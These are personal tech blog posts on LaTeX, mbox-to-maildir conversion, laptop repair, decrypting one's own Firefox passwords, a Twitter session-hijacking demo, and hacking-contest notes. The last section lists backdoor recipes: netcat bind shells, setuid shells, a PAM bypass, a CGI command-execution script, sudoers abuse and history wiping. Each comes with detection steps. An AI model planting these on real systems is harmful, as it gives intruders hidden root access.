Scale Text to the maximum of a page with LaTeX

Being confronted with having to produce a simple poster that holds just a few letters but prints them as big as possible, I found myself needing to scale text (or a letter) on a page.

At first, I found \scalebox, which unfortunately takes a scaling factor, and not two dimensions. Instead of trying to do math, I found \resizebox which does take dimensions (width and height).

You might think that simply scaling up to the \textwidth is enough, but it’s not, as you can see from the following “l”, which was typeset using this code:

\documentclass[
landscape,
a6paper,
]{scrartcl}
\usepackage[pdftex]{graphicx}
\usepackage{palatino}
\begin{document}
\resizebox{\textwidth}{!}{l}%
\end{document}

And here’s the result:

"l" doesn't scale on A6 landscape paper

So the character doesn’t scale well in the sense that if it is too narrow, it grows too tall. Unfortunately, \resizebox doesn’t automatically keep the aspect ratio when you give it both dimensions, and it doesn’t take such an argument as \includegraphics does. Fortunately, you can still make it keep the aspect ratio by globally setting the appropriate flag! So the following will work as expected:

\documentclass[landscape]{minimal}
\usepackage[showframe,a4paper]{geometry}
\usepackage{graphicx}
\setkeys{Gin}{keepaspectratio}

\newcommand{\vstretch}[1]{\vspace*{\stretch{#1}}}
\usepackage{palatino}
\begin{document}
\resizebox{\textwidth}{\textheight}{l}%
\end{document}

One last thing is multiline and centered output. The awesome people over at TeX StackExchange have a solution:

\documentclass[landscape]{minimal}
\usepackage[showframe,a6paper]{geometry}
\usepackage{varwidth}
\usepackage{graphicx}
\setkeys{Gin}{keepaspectratio}

\newcommand{\vstretch}[1]{\vspace*{\stretch{#1}}}
\usepackage{palatino}
\begin{document}
\topskip0pt
% This seems to fully work
\vstretch{1}
\centering\noindent\resizebox*\textwidth\textheight{\begin{varwidth}{\textwidth}%
\centering%
foooooooooooooooo

\centering
bar%
\end{varwidth}}

\vstretch{1}

\pagebreak
% Trying to other method with the table
\vstretch{1}
\centering\noindent\resizebox*\textwidth\textheight{\begin{varwidth}{\textwidth}%
\begin{tabular}{@{}c@{}}
foooooooooooooooo\\

bar
\end{tabular}%
\end{varwidth}}
\vstretch{1}

\end{document}

And the rendered result:

Converting Mailman archives (mboxes) to maildir

I wanted to search discussions on mailing lists and view conversations. I didn’t want to use some web interface because that wouldn’t allow me to search quickly and offline. So making my mail client aware of these emails seemed to be the way to go. Fortunately, the GNOME mailing lists are archived as mbox. So you can download the entire traffic in a standardised mbox file.

But how to properly get this into your email clients then? I think Thunderbird can import mbox natively. But I wanted to access it from other clients, too, so I needed to make my server aware of these emails. Of course, I configured my mailserver to use maildir, so some conversion was needed.

I will present my experiences dealing with this problem. If you want to do similar things, or even only want to import the mbox directly, this post might be for you.

The archives

First, we need to get all the archives. As I had to deal with a couple of mailing lists and more than a couple of months, I couldn’t be arsed to click every single mbox file manually.

The following script scrapes the mailman page. It makes use of the interesting Splinter library, basically a Python wrapper around Selenium and other browsers.

#!/usr/bin/env python

import getpass
from subprocess import Popen, list2cmdline
import sys

import splinter

def fill_password(b, username=None, password=None):
    if not username:
        username = getpass.getpass('username: ')
    if not password:
        password = getpass.getpass('password: ')
        
    b.fill('username', username)
    b.fill('password', password)
    b.find_by_name('submit').click()


def main(url, username=None):
    b = splinter.Browser()
    
    try:
        #url = 'https://mail.gnome.org/mailman/private/board-list/'
        b.visit(url)
        
        if 'Password' in b.html:
            fill_password(b, username=username)


        links = [l['href'] for l in b.find_link_by_partial_text('Text')]

        cookie = b.driver.get_cookies()[0]
        cookie_name = cookie['name']
        cookie_value = cookie['value']
        cookie_str = "Cookie: {name}={value}".format(name=cookie_name, value=cookie_value)
        wget_cookie_arg = '--header={0}'.format(cookie_str)
        #print  wget_cookie_arg
        
        b.quit()

        
        for link in links:
            #print link
            cmd = ['wget', wget_cookie_arg, link]
            print list2cmdline(cmd)
            # pipe that to "parallel -j 8"

    except:
        # make sure the browser is shut down, but don't swallow the error
        b.quit()
        raise


if __name__ == '__main__':
    site = sys.argv[1]
    user = sys.argv[2]
    
    if site.startswith('http'):
        url=site
    else:
        url = 'https://mail.gnome.org/mailman/private/{0}'.format(site)
    
    main(username=user, url=url)

        

You can download the thing, too.

I use Splinter because neither handling cookies nor parsing the web page is fun. So I just use whatever is most convenient for me; I wanted to get things done, after all. The script will print a line for each link it finds, nicely prefixed with wget and the necessary arguments for the authorisation cookie. You can pipe that to sh, but if you want to download many months, you want to do it in parallel. And fortunately, there is an app for that!
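
Assuming the script is saved as, say, get-mboxes.py (a name I just made up), the whole download then boils down to something like:

python get-mboxes.py board-list myuser | parallel -j 8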

Conversion to maildir

After having received the mboxes, it turned out to be a good idea nonetheless to convert them to maildir; if only to extract properly formatted mails and remove duplicates.

I came across mb2md-3.20.pl from 2004 quite soon, but it is broken. It cannot parse my mboxes properly. It creates broken mails with headers lingering around, as it seems to be unable to detect the beginning of new mails reliably. It took me a good while to find the problem though. So again, be advised: do not use mb2md 3.20.

As I use mutt myself, I found this blog article promising. It uses mutt to create an mbox out of a maildir. I wanted it the other way round, so after a bit of trial and error, I figured that the following would do what I wanted:

mutt -f mymbox -e 'set mbox_type=maildir; set confirmcreate=no; set delete=no; push "T.*;s/tmp/mymuttmaildir"'

where “mymbox” is your source file and “/tmp/mymuttmaildir” the target directory.

This is a bit lame right? We want to have parameters, because we want to do some batch processing on many archive mboxes.

The problem is, though, that the parameters are very deep inside the quotes. So just doing something like

mutt -f $source -e 'set mbox_type=maildir; set confirmcreate=no; set delete=no; push "T.*;s$target"'

wouldn’t work, because the $target would be interpreted as a raw string due to the single quotes. And I couldn’t find a way to make it work so I decided to make it work with the language that I like the most: Python. So an hour or so later I came up with the following which works (kinda):

import os
import subprocess
source = os.environ['source']
destination = os.environ['destination']

conf = 'set mbox_type=maildir; set confirmcreate=no; set delete=no; push "T.*;s{0}"'.format(destination)

cmd = ['mutt', '-f', source, '-e', conf]
subprocess.call(cmd)

But well, I wasn’t meant to become productive just yet. Mutt apparently expects a terminal; it would just prompt me with “No recipients were specified.”.

So alright, this unfortunately wasn’t what I wanted. If you don’t need batch processing though, you might very well go with mutt doing your mbox to maildir conversion (or vice versa).

Damnit, another two hours or more wasted on that. I was at the point of just doing the conversion myself. Shouldn’t be too hard after all, right? While researching I found that Python’s stdlib has some email related functions *yay*. Some dude on the web wrote something close to what I needed. I beefed it up a little bit and ended up with the following:

#!/usr/bin/env python

# http://www.hackvalue.nl/en/article/109/migrating%20from%20mbox%20to%20maildir

import datetime
import email
import email.Errors
import mailbox
import os
import sys
import time


def msgfactory(fp):
    try:
        return email.message_from_file(fp)
    except email.Errors.MessageParseError:
        # Don't return None since that will
        # stop the mailbox iterator
        return ''
dirname = sys.argv[1]
inbox = sys.argv[2]
fp = open(inbox, 'rb')
mbox = mailbox.UnixMailbox(fp, msgfactory)


try:
        os.mkdir(dirname, 0750)
        os.mkdir(dirname + "/new", 0750)
        os.mkdir(dirname + "/cur", 0750)
except OSError:
        # the maildir (or parts of it) may exist already
        pass

count = 0
for mail in mbox:
        count+=1
        #hammertime = time.time() # mail.get('Date', time.time())
        # parsedate returns a 9-tuple; only the first six values feed datetime
        hammertime = datetime.datetime(*email.utils.parsedate(mail.get('Date',''))[:6]).strftime('%s')
        hostname = 'mb2mdpy'
        filename = dirname + "/cur/%s%d.%s:2,S" % (hammertime, count, hostname)
        mail_file = open(filename, 'w+')
        mail_file.write(mail.as_string())
        mail_file.close()


print "Processed {0} mails".format(count)

And it seemed to work well! It recovered many more emails than the Perl script (hehe) but the generated maildir wouldn’t work with my IMAP server. I was confused. The mutt maildirs worked like charm and I couldn’t see any difference to mine.

I scp’d the files onto my .maildir/ on my server, which took quite a while because scp isn’t all too quick when it comes to many small files. Anyway, it wouldn’t work, for some reason that is way beyond me. Eventually I straced the IMAP server and figured that it was desperately looking for a tmp/ folder. Funnily enough, it didn’t need that for other maildirs to work. Anyway, lesson learnt: if your Dovecot doesn’t play well with your maildir and you have no clue how to make it log more verbosely, check whether you need a tmp/ folder.

But I didn’t know that, so I investigated a bit more and found another Perl script which converted the emails fine, too. For some reason it put my mails in “new/” and not in “cur/”, which the other tools did so far. Also, it would leave the messages as unread, which I don’t like.

Fortunately, one (more or less) only needs to rename the files in a maildir to end in S for “seen”. While this sounds like a simple

for f in maildir/cur/*; do mv ${f} ${f}:2,S; done

it’s not so easy anymore when you have to move the directory as well. But that’s easily worked around by shuffling the directories around.

Another, more annoying problem with that is “Argument list too long” when you are dealing with a lot of files. So a solution must involve “find” and might look something like this: find ${CUR} -type f -print0 | xargs -i -0 mv '{}' '{}':2,S
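
If you prefer, the same renaming can be done in Python, which sidesteps the argument list limit, too. A minimal sketch, assuming the messages carry no maildir flags yet:

#!/usr/bin/env python
# Minimal sketch: flag every message in a maildir's cur/ as seen by
# renaming it, without hitting the shell's argument list limit.
import os
import sys

cur = sys.argv[1]  # e.g. maildir/cur
for name in os.listdir(cur):
    if not name.endswith(':2,S'):
        path = os.path.join(cur, name)
        os.rename(path, path + ':2,S')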

Duplicates

There was, however, a very annoying issue left: duplicates. I haven’t investigated where the duplicates came from, but it didn’t matter to me, as I didn’t want duplicates even if the downloaded mbox archives contained them. And in my case, I’m quite confident that the mboxes are messed up. So I wanted to get rid of duplicates anyway and decided to use a hash function on the file content to determine whether two files are the same or not. I used sha1sum like this:

$ find maildir/.board-list/ -type f -print0 | xargs -0 sha1sum   | head
c6967e7572319f3d37fb035d5a4a16d56f680c59  maildir/.board-list/cur/1342797208.000031.mbox:2,
2ea005ec0e7676093e2f488c9f8e5388582ee7fb  maildir/.board-list/cur/1342797281.000242.mbox:2,
a4dc289a8e3ebdc6717d8b1aeb88959cb2959ece  maildir/.board-list/cur/1342797215.000265.mbox:2,
39bf0ebd3fd8f5658af2857f3c11b727e54e790a  maildir/.board-list/cur/1342797210.000296.mbox:2,
eea1965032cf95e47eba37561f66de97b9f99592  maildir/.board-list/cur/1342797281.000114.mbox:2,

and if there were two files with the same hash, I would delete one of them. Probably like so:

    #!/usr/bin/env python
    import os
    import sys


    hashes = []
    for line in sys.stdin.readlines():
        hash, fname = line.split()
        if hash in hashes:
            os.unlink(fname)
        else:
            hashes.append(hash)
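
To use it, one would pipe the sha1sum output from above into the script (dedup.py being a made-up name):

find maildir/.board-list/ -type f -print0 | xargs -0 sha1sum | python dedup.py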

But it turns out that the following snippet works, too:

find /tmp/maildir/ -type f -print0 | xargs -0 sha1sum | sort | uniq -d -w 40 | awk '{print $2}' | xargs rm

So it’ll check the files for the same contents via sha1sum. In order to make uniq detect equal lines, we need to give it sorted input; hence the sort. We cannot, however, check the whole lines for equality, because each line ends in a different filename. So we only compare the first 40 characters, the length of the hex representation of the hash. If we find such a duplicate hash, we cut off the hash, take the filename, which is the remainder of the line, and delete the file.

Phew. What a trip so far. Let’s put it all together:

The final thing


LIST=board-list

umask 077

DESTBASE=/tmp/perfectmdir

LISTBASE=${DESTBASE}/.${LIST}

CUR=${LISTBASE}/cur
NEW=${LISTBASE}/new
TMP=${LISTBASE}/tmp

mkdir -p ${CUR}
mkdir -p ${NEW}
mkdir -p ${TMP}

for f in  /tmp/${LIST}/*; do /tmp/perfect_maildir.pl ${LISTBASE} < ${f} ; done
# perfect_maildir.pl drops everything into new/, so swap new/ and cur/
mv ${CUR} ${CUR}.tmp
mv ${NEW} ${CUR}
mv ${CUR}.tmp ${NEW}
# mark all messages as seen
find ${CUR} -type f -print0 | xargs -i -0 mv '{}'  '{}':2,S
# remove duplicate messages by comparing hashes
find ${CUR} -type f -print0 | xargs -0 sha1sum | sort | uniq -d -w 40 | awk '{print $2}' | xargs rm

And that’s handling email in 2012…

Loopback mounting a huge gzipped file

This is basically a note to myself for future reference which I hope is interesting to others.

I just had to loopback mount a gzipped image file. I didn’t want, however, to unpack the file, because I am very short on disk space right now. Also, I didn’t care too much about processing power. I searched quite a bit until I found “avfs”.

AVFS is a system, which enables all programs to look inside archived or compressed files, or access remote files without recompiling the programs or changing the kernel.

At the moment it supports floppies, tar and gzip files, zip, bzip2, ar and rar files, ftp sessions, http, webdav, rsh/rcp, ssh/scp

muelli@xbox:/tmp$ avfsd -o allow_root ~/.avfs
muelli@xbox:/tmp$ cd  ~/.avfs/home/muelli/qemu
muelli@xbox:~/.avfs/home/muelli/qemu$ sudo losetup /dev/loop1 XP-4G.ntfs.dd.gz#
muelli@xbox:~/.avfs/home/muelli/qemu$ sudo mount /dev/loop1 -oro,noatime /home/muelli/empty/

Note that the filename I’m accessing is suffixed with a hash.

x61s and the backlight: replacing a CCFL and shorting a fuse

Over the last months, I tried to repair my broken x61s which suffered from a missing backlight.

First, I changed the inverter, which is easy and relatively cheap to do. In case you read the Hardware Maintenance Manual, don’t follow it too closely. The inverter is easily changeable by removing the three screws on the bottom of the opened panel and carefully detaching the clipped front cover of the panel. The inverter sits on the bottom right and is the part that also lights the LEDs. You can’t miss it. But be careful: The inverter puts out high voltage, in the range of 600V to 800V, peaking at 1500V. Hence it’s hard to measure with normal home equipment :-/

Anyway, changing the inverter didn’t bring my backlight back up. So I got myself an LCD cable, which is more expensive and a bit harder to attach than the inverter. You need to remove the LCD panel from its case, which involves a lot of screws. Don’t forget to have separate bowls for the screws, and even better: take pictures or notes to remember where the screws have been. Or be very disciplined and follow the official instructions.

However, changing the LCD cable didn’t bring any remedy. So the only culprit, that I could think of, was the CCFL that’s actually responsible for lighting up the whole thing. So I got myself a new CCFL for a couple of euros.

Changing the CCFL is a bit messy, especially because it involves soldering. There are good instructions on the web as to how to change the CCFL. It also requires you to be very gentle with the tube so that it doesn’t break. And losing any part will probably result in a substantial loss of quality, so be careful. I mean it. I lost a tiny rubber ring which is to be placed around the tube to hold it tight in its channel, and now the tube vibrates nicely in the panel, making interesting noises.

Anyway, changing the CCFL didn’t bring back the backlight. I was very confused. There was no part I knew of that I hadn’t changed, with the exception of the motherboard… So I asked a friend of mine to provide his perfectly working x61s so that we’d have a reference platform that we knew was working. Thanks again to that friendly fellow who allowed the disassembly and reassembly of his machine several times 🙂 We switched several parts and it turned out that my panel with the new CCFL kinda worked with the other inverter card. It didn’t with my inverter though. Again, very weird. As it turned out later, the CCFL contacts were not correctly insulated and short-circuited :-/ But we didn’t know that and thought the CCFL was broken from the very beginning. So my recommendation, which is also more (unpleasant) work, is: checkpoint your work, i.e. run a test every now and then. It would have saved us a lot of trouble.

So after having cross-checked that my inverter was working correctly and the backlight was acting weird, I came across the fact that there might be a blown fuse. And indeed, the F2 fuse, which was not findable without a helping picture, was not letting anything through. Since it’s an SMD fuse, there was no chance of soldering a new fuse onto the mainboard. So we just shorted the fuse with conductive silver paint.

Fortunately, the laptop’s backlight is working again, now. However, the keyboard is not. I presume that the whole dis- and reassembly shortened the lifespan of the keyboard cable. Also, as I mentioned, the CCFL is humming in the panel…

Dump Firefox passwords using Python (and libnss)

I was travelling and I didn’t have my Firefox instance on my laptop. I wanted, however, to access some websites whose passwords were stored safely in my Firefox profile at home. Needless to say that I don’t upload my passwords to someone’s server. Back in the day, when I first encountered that problem, there were only ugly options to run the server yourself: either some PHP garbage or, worse, some Java webapp. I only have so many gigabytes of RAM, so I didn’t go that route. FWIW: now you have a nice Python webapp, and it might be interesting to set that up at some stage.

I could have copied the profile to my laptop and run Firefox with that profile. But as I use Zotero, my profile is really big. And it sounds quite insane to copy 200MB when I only want to get hold of a 20 byte password.

Another option might have been to run Firefox remotely and do X forwarding to my laptop. But that’d be painfully slow, and I thought that I was suffering enough already.

So. I wanted to extract the passwords from the Firefox profile at home. It’s my data after all, right? Turns out that Firefox (and Thunderbird for that matter) stores its passwords encrypted in a SQLite database. So the database itself is not necessarily encrypted, but the contained data is. It turned out later that you can encrypt the database as well (to then store encrypted passwords in it).

So a sample line in that database looks like this:

$ sqlite3 signons.sqlite 
SQLite version 3.7.11 2012-03-20 11:35:50
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> .schema
CREATE TABLE moz_deleted_logins (id                  INTEGER PRIMARY KEY,guid                TEXT,timeDeleted         INTEGER);
CREATE TABLE moz_disabledHosts (id                 INTEGER PRIMARY KEY,hostname           TEXT UNIQUE ON CONFLICT REPLACE);
CREATE TABLE moz_logins (id                 INTEGER PRIMARY KEY,hostname           TEXT NOT NULL,httpRealm          TEXT,formSubmitURL      TEXT,usernameField      TEXT NOT NULL,passwordField      TEXT NOT NULL,encryptedUsername  TEXT NOT NULL,encryptedPassword  TEXT NOT NULL,guid               TEXT,encType            INTEGER, timeCreated INTEGER, timeLastUsed INTEGER, timePasswordChanged INTEGER, timesUsed INTEGER);
CREATE INDEX moz_logins_encType_index ON moz_logins(encType);
...
...
sqlite> SELECT * FROM moz_logins LIMIT 2;
1|https://nonpublic.foo.bar|Non-Pulic Wiki||||MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECFKoZIhvcNAwcECFKoZIhvcNAwcECF|MDIEEPgAAAAAAAAAAAAAACJ75YchXUCAAAAAEwFAYIKoZIhvcNAwcE==|{4711r2d2-2342-4711-6f00b4r6g}|1|1319297071173|1348944692451|1319297071173|6
2|https://orga.bar.foo|ToplevelAuth||||MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECIy5HFAYIKoZIhtnRFAYIKoZIh|MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvFAYIKoZIhBD6PFAYIKoZIh|{45abc67852-4222-45cc-dcc1-729ccc91ceee}|1|1319297071173|1319297071173|1319297071173|1
sqlite> 

You see the columns you’d more or less expect but you cannot make sense out of the actual data.
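
Getting at the raw rows is the easy part, by the way; a minimal sketch using Python’s sqlite3 module, with the table and column names from the schema above:

#!/usr/bin/env python
# Minimal sketch: read the (still encrypted) logins from signons.sqlite.
import sqlite3

conn = sqlite3.connect('signons.sqlite')
query = 'SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins'
for hostname, enc_user, enc_pass in conn.execute(query):
    print hostname, enc_user, enc_pass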

If I read correctly, some form of 3DES is used to protect the data. But I couldn’t find out enough to decrypt it myself. So my idea then was to reuse the actual libraries that Firefox uses to read data from the database.

I first tried to find examples in the Firefox code and found pwdecrypt. And I even got it built after a couple of hours wrestling with the build system. It’s not fun. You might want to try to get hold of a binary from your distribution.

So my initial attempt was to call out to that binary and parse its output. That worked well enough, but was slow. Also not really elegant and you might not have or not be able to build the pwdecrypt program. Also, it’s a bit stupid to use something different than the actual Firefox. I mean, the code doing the necessary operations is already on your harddisk, so it seems much smarter to reuse that.

Turns out, there is ffpwdcracker to decrypt passwords using libnss. It’s not too ugly using Python’s ctypes. So that’s a way to go. And in fact, it works well enough, after cleaning up loads of things.
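
The core of it is a handful of ctypes calls into libnss3. Here’s a minimal sketch of the idea, assuming no master password is set and with a made-up profile path; PK11SDR_Decrypt is the NSS function that undoes the “secret decoder ring” encryption:

#!/usr/bin/env python
# Minimal sketch: decrypt a moz_logins value with libnss3 via ctypes.
# Assumes no master password; the profile path is a placeholder.
import base64
import ctypes

class SECItem(ctypes.Structure):
    # struct SECItemStr { SECItemType type; unsigned char *data; unsigned int len; }
    _fields_ = [('type', ctypes.c_uint),
                ('data', ctypes.c_void_p),
                ('len', ctypes.c_uint)]

nss = ctypes.CDLL('libnss3.so')
profile = '/home/muelli/.mozilla/firefox/abcd1234.default'  # placeholder
if nss.NSS_Init(profile) != 0:
    raise RuntimeError('NSS_Init failed')

def decrypt(b64blob):
    raw = base64.b64decode(b64blob)
    inp = SECItem(0, ctypes.cast(ctypes.c_char_p(raw), ctypes.c_void_p), len(raw))
    out = SECItem(0, None, 0)
    if nss.PK11SDR_Decrypt(ctypes.byref(inp), ctypes.byref(out), None) != 0:
        raise RuntimeError('PK11SDR_Decrypt failed')
    return ctypes.string_at(out.data, out.len)

Feed that the base64 blobs from the encryptedUsername and encryptedPassword columns and you get the plain text back.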

Example output of the session is here:


$ python firefox_passwd.py | head
FirefoxSite(id=1, hostname=u'https://nonpublic.foo.bar', httpRealm=u'Non-Pulic Wiki', formSubmitURL=None, usernameField=u'', passwordField=u'', encryptedUsername=u'MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECFKoZIhvcNAwcECFKoZIhvcNAwcECF', encryptedPassword=u'MDIEEPgAAAAAAAAAAAAAACJ75YchXUCAAAAAEwFAYIKoZIhvcNAwcE==', guid=u'{4711r2d2-2342-4711-6f00b4r6g}', encType=1, plain_username='wikiuser', plain_password='mypass')
FirefoxSite(id=2, hostname=u'https://orga.bar.foo', httpRealm=u'ToplevelAuth', formSubmitURL=None, usernameField=u'', passwordField=u'', encryptedUsername=u'MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECIy5HFAYIKoZIhtnRFAYIKoZIh', encryptedPassword=u'MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvFAYIKoZIhBD6PFAYIKoZIh', guid=u'{45abc67852-4222-45cc-dcc1-729ccc91ceee}', encType=1, plain_username='suspect', plain_password='susicious')

The file is here: https://hg.cryptobitch.de/firefox-passwords/

It has also been extended to work with Thunderbird and, the bigger problem, with encrypted databases. I couldn’t really find out how that works. I read some code, especially the above mentioned pwdecrypt program, but couldn’t reimplement it, because I couldn’t find the functions used in the libraries I had. At some stage, I just explained the problem to a friend of mine, and while explaining and documenting which things didn’t work, I accidentally found a solution \o/ So now you can also recover your Firefox passwords from an encrypted storage.

Pwnitter

Uh, I totally forgot to blog about a funny thing that happened almost a year ago which I just mentioned slightly *blush*. So you probably know this Internet thing and if you’re one of the chosen and carefully gifted ones, you confused it with the Web. And if you’re very special you do this Twitter thing and expose yourself and your communications pattern to some dodgy American company. By now, all of the following stuff isn’t of much interest anymore, so you might as well quit reading.

It all happened while I was at FOSS.in. There was a contest run by Nokia which asked us to write some cool application for the N900. So I did. I packaged loads of programs and libraries to be able to put the wireless card into monitor mode. Then I wiretapped (haha) the wireless and sniffed for Twitter traffic. Once there was a Twitter session going on, the necessary authentication information was extracted and a message was posted on the poor user’s behalf. I coined that Pwnitter, because it would pwn you via Twitter.

That said, we had great fun at FOSS.in, where nearly everybody’s Twitter session got hijacked 😉 Eventually, people stopped using plain HTTP and moved to end-to-end encrypted sessions via TLS.

Anyway, my program didn’t win anything because, as it turned out, Nokia wanted to promote QML and hence we were supposed to write something that makes use of that. My program barely has a UI… It is made up of one giant button…

Despite not getting lucky with Nokia, the community apparently received the thing very well.

So there is an obvious big elephant standing in the room, asking why you would want to “hack” Twitter. I’d say it’s rather easy to answer. The main point is that you should use end-to-end encryption for your communication. And here comes the punchline: don’t use a service that doesn’t offer you that by default. Technically, it wouldn’t be much of a problem to give you an encrypted link to send your messages. However, companies tend to be cheap and let you suffer with a plain text connection which can be easily tapped or, worse, manipulated. Think about it. If the company is too frugal to protect your communication from pimpled 13yr olds with a wifi card, why would you want to use their services?

By now, Twitter has SSL enabled by default as far as I can tell (actually since March 2011, making it more than 6 months ago AFAIK). So let’s not bash Twitter for not offering an encrypted link for more than 5 years (since they were founded back in 2006). But there are loads of other services that suffer from the very same basic problem, including Facebook. And it would be easy to adapt the existing solution to stuff like Facebook, Flickr, whatnot.

A notable exception is Google though. As far as I can see, they offer encryption by default except for the search. If there is an unencrypted link, I invite you to grab the sources of Pwnitter and build your hack.

If you do so, let me give you a piece of advice, as I was going nuts over a weird problem with my Pwnitter application for Maemo. It’s written in Python, and when building the package with setuptools, the hashbang would automatically be changed to “#!/scratchbox/tools/bin/python”, instead of, say, “/usr/bin/python”.

I tried tons of things for many hours until I realised, that scratchbox redirects some binary paths.

However, that did not help me to fix the issue. As it turned out, my problem was that I didn’t depend on a Python runtime during build time. Hence the build server picked scratchbox’s Python, which was located in /scratchbox/bin.

LinuxTag Hacking Contest Notes

As I wrote the other day, I have been to LinuxTag in Berlin. And almost like last year, a hacking contest took place.

LinuxTag 2011 - Hacking Contest

The rules were quite the same: two teams play against each other, each team having a laptop. The game has three rounds of 15 minutes each. In the first round the teams swap their laptops, so that you have the opponent’s machine. You are supposed to hide backdoors and other stuff. In the second round the laptops are swapped back and you have to find and remove these backdoors. For the third round the laptops are swapped once again and you can show off which backdoors were left in the system.

So preparation seems to be the obvious key factor for winning. While I did prepare some notes, they turned out to not be very good for the actual contest, because they were not structured well enough.

Since the game has three rounds, it makes sense to have a structure with three parts as well. Hence I produced a new set of notes with headlines for each backdoor and three parts per section. Namely Hacking, Fixing and Exploiting.

The notes weren’t fully ready just before the contest, and hence we didn’t score all that well. But I do think that our notes are quite cool by now. Next time, when we’re more used to the situation and have hopefully learned through suffering not to make all those tiny mistakes we made, we might play better.

So enjoy the following notes and feel free to give feedback.

Set Keyboard to US English:

setxkbmap us
export HISTFILE=/dev/null
ln -sf /dev/null ~/.bash_history
ln -sf /dev/null ~/.viminfo

# touch everything continuously so changed files don't stand out by mtime
while true; do find / -exec touch {} \; ; sleep 2; done


1
  passwd new user

Remote
root


1.1
  Hacking

nano /etc/passwd

copy and paste root user to a new user, i.e. hackr.

sudo passwd hackr


1.2
  Fixing

grep :0: /etc/passwd


1.3
  Exploiting

ssh hackr@localhost


2
  dePAMify

Remote
root


2.1
  Hacking

cd /lib/security/
cp pam_permit.so pam_deny.so
echo > /etc/pam.d/sshd
/etc/init.d/sshd restart


2.2
  Fixing

too hard


2.3
  Exploiting

ssh root@localhost

enter any password


3
  NetworkManager

Remote
root


3.1
  Hacking

nano /etc/NetworkManager/dispatcher.d/01ifupdown <<EOF
nc.traditional -l -p 31346 -e /bin/bash &
cp /bin/dash /etc/NetworkManager/dhclient
chmod +s /etc/NetworkManager/dhclient
EOF


3.2
  Fixing

ls /etc/NetworkManager/dispatcher.d/


3.3
  Exploiting

less /etc/NetworkManager/dispatcher.d/

Disconnect Network via NetworkManager

Connect Network via NetworkManager

/etc/NetworkManager/dhclient

netcat localhost 31346


4
  SSHd

Remote
root


4.1
  Hacking

su -
ssh-keygen
cd
cat .ssh/id_rsa.pub | tee /etc/ssh/authorized_keys
cat .ssh/id_rsa | tee /etc/issue.net
cp /etc/ssh/sshd_config /tmp/
nano /etc/ssh/sshd_config <<EOF
AuthorizedKeysFile /etc/ssh/authorized_keys
Banner /etc/issue.net
EOF

/etc/init.d/ssh reload
mv /tmp/sshd_config /etc/ssh/


4.2
  Fixing

less /etc/ssh/sshd_config

/etc/init.d/ssh reload


4.3
  Exploiting

ssh root@localhost 2> /tmp/root
chmod u=r,go= $_
ssh  -i /tmp/root root@localhost


5
  xinetd

Remote
root


5.1
  Hacking

cp  /etc/xinetd.d/chargen  /etc/xinetd.d/chargen.bak

nano /etc/xinetd.d/chargen <<EOF

disable = no
DELETE type = INTERNAL
server = /bin/dash
EOF

/etc/init.d/xinetd restart

mv /etc/xinetd.d/chargen.bak  /etc/xinetd.d/chargen


5.2
  Fixing

grep disable  /etc/xinetd.d/* | grep no


5.3
  Exploiting

nc localhost chargen


6
  Apache

Remote
root

Needs testing


6.1
  Hacking

nano /etc/apache2/sites-enabled/000-default

DocumentRoot /
Make <Directory />  and copy allowance from below

/etc/init.d/apache2 restart

touch /usr/lib/cgi-bin/fast-cgid
chmod a+rwxs $_
touch /usr/lib/cgi-bin/fast-cgid.empty
chmod a+rwxs $_
nano /usr/lib/cgi-bin/fast-cgid <<EOF
    #!/bin/bash
    IFS=+
    $QUERY_STRING
EOF

nano /etc/sudoers <<EOF
www-data ALL=NOPASSWD: ALL
EOF


6.2
  Fixing

ls -l /usr/lib/cgi-bin/

nano /etc/apache2/sites-enabled/*

/etc/init.d/apache2 restart


6.3
  Exploiting

links2 http://localhost/  # Remote file access
links2 http://localhost/cgi-bin/fast-cgid?id # Remote command execution
grep NOPASS /etc/sudoers  # local privilege escalation
links2 http://localhost/cgi-bin/fast-cgid?sudo+id # Remote root command execution

nano /usr/lib/cgi-bin/fast-cgid.empty <<EOF
/bin/dash
EOF

/usr/lib/cgi-bin/fast-cgid.empty # local privilege escalation


7
  screen

Local
root


7.1
  Hacking

sudo chmod u+s /bin/dash
sudo mkdir -p /etc/screen.d/user/
sudo chmod o+rwt /etc/screen.d/user/
# NOW AS USER!!1
SCREENDIR=/etc/screen.d/user/ screen
# IN THE SCREEN
dash
C-d


7.2
  Fixing

ls -l /var/run/screen
rm -rf /var/run/screen/*

sudo lsof | grep -i screen | grep FIFO
rm these files


7.3
  Exploiting

SCREENDIR=/etc/screen.d/user/ screen -x


8
  hidden root dash

Local
root


8.1
  Hacking

cp /bin/dash /usr/bin/pkexec.d
chmod +s !$
cp /bin/dash /etc/init.d/powersaved
chmod +s !$


8.2
  Fixing

find / \( -perm -4000 -o -perm -2000 \) -type f -exec ls -la {} \;

rm these files


8.3
  Exploiting

/etc/init.d/powersaved

/usr/bin/pkexec.d


9
  DHCP Hook

Local
Remote
root


9.1
  Hacking

nano /etc/dhcp3/dhclient-exit-hooks.d/debug <<EOF
nc.traditional -l -p 31347 &
cp /bin/dash /var/run/dhclient
chmod +s /var/run/dhclient
EOF


9.2
  Fixing

ls -l /etc/dhcp3/dhclient-exit-hooks.d/
ls -l /etc/dhcp3/dhclient-enter-hooks.d/


9.3
  Exploiting

Reconnect Network via DHCP

/var/run/dhclient

netcat localhost 31347


10
  ConsoleKit

Local
root

Switching VTs is triggered locally only, although one might argue that switching terminals is done on every boot. Hence it’s kinda automatic.


10.1
  Hacking

sudo -s
touch /usr/lib/ConsoleKit/run-seat.d/run-root.ck
chmod a+x /usr/lib/ConsoleKit/run-seat.d/run-root.ck
nano /usr/lib/ConsoleKit/run-seat.d/run-root.ck

#!/bin/sh

chmod u+s /bin/dash
nc.traditional -l -p 31337 -e /bin/dash &


10.2
  Fixing

ls /usr/lib/ConsoleKit/run-seat.d/

Only one symlink named udev-acl.ck is supposed to be there.


10.3
  Exploiting

ls /usr/lib/ConsoleKit/run-seat.d/

Switch TTY (Ctrl+Alt+F3)

execute /bin/dash

nc IP 31337


11
  SIGSEGV

Local
root


11.1
  Hacking

